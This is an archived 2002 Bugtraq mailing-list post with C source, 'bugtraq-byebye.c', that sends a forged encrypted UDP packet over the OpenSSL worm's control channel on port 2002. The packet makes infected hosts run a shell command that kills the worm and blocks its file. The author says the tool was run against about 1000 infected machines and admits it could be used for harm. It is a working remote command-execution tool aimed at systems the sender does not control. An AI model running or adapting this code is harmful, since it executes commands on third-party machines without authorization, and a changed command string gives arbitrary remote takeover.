lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <PFEHKADDODPLDDIJFACJCENMCKAA.mmiller@hick.org>
From: mmiller at hick.org (Matt Miller)
Subject: bugtraq-byebye.c

do your part, kill a bugtraq.

this code will prevent further compromise assuming a new worm isn't released
that has files named differently.  this is only a temporary way to help
those in need, but it is by no means better than actually upgrading (that
goes without saying, but it still had to be said).

the code below has already been run against about 1000 infected boxen.

anyways...

-- cut --

/*
 * remotely kill off all those lame openssl worms.  the code made me want
 * to cry.  this code has the potential to be used for bad things on
 * owned boxes, please don't :((( kill a bugtraq, save a whitehat!
 *
 * reading rainbow challenge:
 *   see if you can figure out which code below is mine, and which is
[anonymous]'s
 *
 * i'm not sure what the binary runs as in the wild, i hear it's .bugtraq.
 * didn't look over that part of the code.
 *
 * skape
 * mmiller@...k.org
 * 09/16/2002
 */
#include <stdlib.h>
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>

const char cmd[] = "killall .bugtraq; rm -f /tmp/.bugtraq; touch
/tmp/.bugtraq; chmod 000 /tmp/.bugtraq";

#define BUGSMACK_SIZE sizeof(struct sh_rec) + sizeof(cmd)

/*
 * Save me brain cycles.
 */
struct ll_header {
	char type;
	unsigned long checksum;
	unsigned long ll_id;
};

struct sh_rec {
	// llheader
	char type;
	unsigned long checksum;
	unsigned long ll_id;
	// header
	char tag;
	int id;
	unsigned long len;
	unsigned long seq;
};

unsigned int sseed = 0;

void gsrand(unsigned long s) {
        sseed=s;
}

/*
 * yes, let's seed with some really secret number.
 */
unsigned long grand() {
        sseed=((sseed*965764979)%65535)/2;
        return sseed;
}

u_short in_cksum(u_short *addr, int len) {
        register int nleft = len;
        register u_short *w = addr;
        register int sum = 0;
        u_short answer =0;
        while (nleft > 1) {
                sum += *w++;
                nleft -= 2;
        }
        if (nleft == 1) {
                *(u_char *)(&answer) = *(u_char *)w;
                sum += answer;
        }
        sum = (sum >> 16) + (sum & 0xffff);
        sum += (sum >> 16);
        answer = ~sum;
        return(answer);
}

/*
 * This is some awesome encryption.
 */
unsigned long _encrypt(char *str, unsigned long len) {
	unsigned long pos=0,seed[4]={0x78912389,0x094e7bc43,0xba5de30b,0x7bc54da7};
	gsrand(((seed[0]+seed[1])*seed[2])^seed[3]);
	while(1) {
		gsrand(seed[pos%4]+grand()+pos);
		str[pos]+=grand();
		pos++;
		if (pos >= len) break;
	}
	return pos;
}

int main(int argc, char **argv)
{
	unsigned char bugsmack[BUGSMACK_SIZE];
	struct sh_rec *header = (struct sh_rec *)bugsmack;
	struct sockaddr_in s;
	int fd;

	if (argc == 1)
	{
		fprintf(stdout, "Usage: %s ip\n", argv[0]);
		return 0;
	}

	if ((fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) <= 0)
	{
		perror("socket");
		return 0;
	}

	s.sin_family      = AF_INET;
	s.sin_port        = htons(2002);
	s.sin_addr.s_addr = inet_addr(argv[1]);

	if (s.sin_addr.s_addr == -1)
	{
		fprintf(stdout,"invalid ip\n");
		return 0;
	}

	header->type     = 0;
	header->checksum = 0;
	header->ll_id    = 0;
	header->tag      = 0x24;
	header->id       = rand();
	header->len      = BUGSMACK_SIZE - sizeof(struct sh_rec);
	header->seq      = 0;

	strcpy(bugsmack + sizeof(struct sh_rec), cmd);
	_encrypt(bugsmack + sizeof(struct sh_rec), BUGSMACK_SIZE - sizeof(struct
sh_rec));
	header->checksum = in_cksum((u_short *)((unsigned char *)bugsmack +
sizeof(struct ll_header)), BUGSMACK_SIZE - sizeof(struct ll_header));

	if (sendto(fd, (void *)bugsmack, BUGSMACK_SIZE, 0, (struct sockaddr *)&s,
sizeof(s)) < 0)
	{
		perror("sendto");
		return 0;
	}

	fprintf(stdout,"owned :(\n");

	return 1;
}


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ